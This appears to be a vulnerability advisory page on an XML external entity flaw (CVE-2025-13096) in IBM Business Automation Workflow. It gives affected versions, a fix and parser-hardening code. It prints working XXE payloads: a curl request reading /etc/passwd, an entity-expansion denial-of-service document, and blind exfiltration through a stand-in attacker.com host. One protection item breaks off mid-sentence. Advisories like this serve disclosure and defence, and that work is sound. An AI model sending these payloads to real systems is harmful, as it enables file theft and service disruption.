IBM Business Automation Workflow, XML External Entity Injection (XXE), CVE-2025-13096 (High) -DC-May2026-5

Listen to this Post

CVE-2025-13096 is an XML External Entity (XXE) injection vulnerability affecting IBM Business Automation Workflow containers and traditional deployments. The root cause lies in the insecure parsing of untrusted XML data by the application’s XML processor. When the XML parser is configured to resolve external entities and process Document Type Definitions (DTDs), an attacker can supply a malicious XML payload that references external resources. This vulnerability is specifically tied to a missing restriction on the `DOCTYPE` declaration, which allows the definition of `ENTITY` elements that can point to local files, network resources, or trigger recursive memory consumption. The core issue is that the application does not disable external entity processing, leading to Server-Side Request Forgery (SSRF) scenarios under CWE-918. A remote attacker with low privileges can craft an XML request containing an external entity that points to a sensitive local file (e.g., file:///etc/passwd). Upon parsing, the server reads the file’s contents and returns them within the server’s XML response, effectively bypassing access controls. Alternatively, the attacker can define a `DOCTYPE` with multiple nested entities or a single entity referencing a giant file, causing the parser to load the entity repeatedly and exhaust available memory. This leads to a Denial of Service (DoS) condition. The attack vector is network-based (AV:N), requires low attack complexity (AC:L) but demands low-privileged credentials (PR:L) such as a valid authenticated session. No user interaction is needed (UI:N). The confidentiality impact is high (C:H) as sensitive data can be leaked, while the availability impact is low (A:L) due to potential memory exhaustion. The vulnerability affects containers versions from V24.0.0 to V24.0.0-IF007, V24.0.1 to V24.0.1-IF005, and V25.0.0 to V25.0.0-IF002, as well as traditional versions V24.0.0, V24.0.1, and V25.0.0. The fix, tracked as iFix DT456229, is available in versions 24.0.0-IF008, 24.0.1-IF006, and 25.0.0-IF003.

DailyCVE Form:

Platform: IBM BAW
Version: 24.0.0-25.0.0
Vulnerability : XXE/SSRF
Severity: High (CVSS 7.1)
date: 2026-02-02

Prediction: 2026-04-30

Analytics under heading What Undercode Say:

Identify vulnerable endpoints accepting XML input
grep -r "XMLStreamReader|SAXParser|DocumentBuilder" /opt/IBM/BPM/
Check current fix level via CLI
/opt/IBM/BPM/bin/BPMConfig -version | grep -E "24.0.0|24.0.1|25.0.0"
Verify if DOCTYPE processing is restricted in security configuration
curl -X POST -H "Content-Type: application/xml" --data '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' https://target-baw/rest/endpoint
Exfiltrate sensitive data via out-of-band channel
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/collect?data=DATA">
%xxe;
]>
<root>test</root>

Exploit:

<!-- Basic XXE for file disclosure -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
<!-- Nested entities for Denial of Service -->
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<root>&lol3;</root>
<!-- Blind XXE with out-of-band exfiltration -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://attacker.com/xxe.dtd">
%dtd;
]>
<root>&send;</root>

Remote attacker sends crafted XML to any endpoint that parses user-supplied XML without disabling external entities. Successful exploitation leads to retrieval of local files, internal network scanning, or memory exhaustion. Requires authenticated session with low privileges.

Protection:

  1. Apply IBM iFix DT456229 (included in 24.0.0-IF008, 24.0.1-IF006, 25.0.0-IF003).

2. Disable DOCTYPE processing in XML parsers:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

3. Use less complex data formats like JSON where possible.
4. Implement input validation to reject XML containing `Impact:

  • Confidentiality: Exposure of any file readable by the BAW process, including configuration files, databases credentials, and source code.
  • Availability: Memory exhaustion via entity expansion leading to service crash or unresponsiveness.
  • Privilege escalation: Leaked secrets may enable lateral movement or further attacks.
  • Compliance: Potential data breach leading to GDPR, HIPAA or other regulatory penalties.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top